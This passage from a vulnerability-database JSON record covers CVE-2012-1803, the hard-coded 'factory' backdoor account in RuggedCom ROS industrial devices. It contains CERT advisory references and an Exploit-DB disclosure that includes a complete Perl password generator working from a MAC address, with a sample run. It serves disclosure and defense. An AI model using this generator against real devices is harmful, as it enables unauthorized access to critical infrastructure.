E:POC/RL:W/RC:C \nEnvironmental | 1.8 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://seclists.org/fulldisclosure/2012/Apr/277>\n * <http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-116-01.pdf>\n * <http://arstechnica.com/business/news/2012/04/backdoor-in-mission-critical-hardware-threatens-power-traffic-control-systems.ars>\n * <http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/>\n * <http://www.ruggedcom.com/products/index.php>\n * <http://www.ruggedcom.com/support/software/index.php>\n * <http://cwe.mitre.org/data/definitions/261.html>\n * <http://www.ruggedcom.com/productbulletin/ros-security-page/>\n * <https://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01.pdf>\n * <http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01A.pdf>\n\n### Acknowledgements\n\nThanks to Justin W. Clarke, an independent security researcher in San Francisco, California, for reporting this vulnerability. Thanks also to ICS-CERT for testing and additional coordination with RuggedCom.\n\nThis document was written by Michael Orlando and Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1803](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-1803>) \n---|--- \n**Date Public:** | 2012-04-23 \n**Date First Published:** | 2012-04-24 \n**Date Last Updated: ** | 2012-07-18 20:09 UTC \n**Document Revision: ** | 67 \n", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "cert", "title": "RuggedCom Rugged Operating System (ROS) contains hard-coded user account with predictable password", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2012-07-18T20:09:00", "id": "VU:889195", "href": "https://www.kb.cert.org/vuls/id/889195", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "description": "RuggedCom&#39;s Rugged Operating System backdoor account.", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "securityvulns", "title": "RuggedCom SCADA equipment backdoor", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "SECURITYVULNS:VULN:12347", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12347", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-06-07T16:19:31", "description": "", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "exploitdb", "title": "RuggedCom Devices - Backdoor Access", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1803", "2012-2441", "CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "EDB-ID:18779", "href": "https://www.exploit-db.com/exploits/18779", "sourceData": "Title: Undocumented Backdoor Access to RuggedCom Devices\nAuthor: jc\nOrganization: JC CREW\nDate: April 23, 2012\nCVE: CVE-2012-1803\n\nBackground:\nRuggedCom is one of a handful of networking vendors who capitalize on\nthe market for \"Industrial Strength\" and \"Hardened\" networking\nequipment. You'll find their gear installed in traffic control\nsystems, railroad communications systems, power plants, electrical\nsubstations, and even US military sites. Beyond simple L2 and L3\nnetworking these devices are also used for serial-to-ip converstion in\nSCADA systems and they even support modbus and dnp3. RuggedCom\npublished a handy guide to some of their larger customers at\nwww.ruggedcom.com/about/customers/. My favorite quote is from a\ncontractor who installed RuggedCom equipment at a US Air Force base:\n\"Reliability was not an option.\" How unfortunately apropos.\n\nProblem:\nAn undocumented backdoor account exists within all released versions\nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the\naccount, which cannot be disabled, is \"factory\" and its password is\ndynamically generated based on the device's MAC address. Multiple\nattempts have been made in the past 12 months to have this backdoor\nremoved and customers notified.\n\nExploit:\n#!/usr/bin/perl\nif (! defined $ARGV[0]) {\nprint \"+========================================== \\n\";\nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\";\nprint \"+ JC CREW April 23 2012 \\n\";\nprint \"+ Usage:\\n$0 macaddress \\n\";\nprint \"+========================================== \\n\";\nexit; }\n$a = $ARGV[0];\n$a =~ s/[^A-F0-9]+//simg;\n@b = reverse split /(\\S{2})/,$a;\n$c = join \"\", @b;\n$c .= \"0000\";\n$d = hex($c) % 999999929;\nprint \"$d\\n\";\n\nExample usage:\nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some\nperl and learn that the password for \"factory\" is 60644375.\n\n[jc (at) pig (dot) aids [email concealed] ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00\n60644375\n[jc (at) pig (dot) aids [email concealed] ros]$\n\nShoutouts:\nCERT/CC for doing great work in trying to get vendors to actually fix things.\nJC CREW\n\nTimeline:\nApr 2011 - Vendor notified directly\nJul 2011 - Vendor verbally acknowledges knowledge of backdoor,\nand ceases communication.\nFeb 11 2012 - US-CERT notified\nMar 12 2012 - Vendor responds to US-CERT.\nApr 06 2012 - Due to lack of further contact by vendor, CERT sets\npublic disclosure for April 13 2012\nApr 10 2012 - Vendor states they need another three weeks to alert\ntheir customers, but not fix the vulnerability.\nApr 11 2012 - Clarification requested regarding need for additional three weeks.\nApr 23 2012 - No response from vendor.\nApr 23 2012 - This disclosure.\n\nKeywords:\nRuggedCom\nROS\nRuggedSwitch\nRuggedServer\nbackdoor", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/hardware/remote/18779.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}